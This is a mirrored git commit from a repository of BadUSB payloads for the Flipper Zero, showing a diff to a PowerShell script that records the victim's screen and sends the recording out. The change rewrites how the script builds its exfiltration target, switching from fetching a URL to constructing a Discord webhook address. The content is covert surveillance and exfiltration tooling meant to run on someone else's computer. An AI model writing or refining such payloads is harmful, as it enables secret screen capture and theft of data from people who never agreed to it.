mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-12 15:50:08 -08:00
Update main.ps1
This commit is contained in:
@@ -6,7 +6,9 @@ This script records the screen for a specified time to a mkv file, then sends th
|
||||
#>
|
||||
|
||||
$hookurl = "$dc"
|
||||
if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url}
|
||||
if ($hookurl.Length -lt 120){
|
||||
$hookurl = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
}
|
||||
|
||||
while($true){
|
||||
|
||||
|
||||
Reference in New Issue
Block a user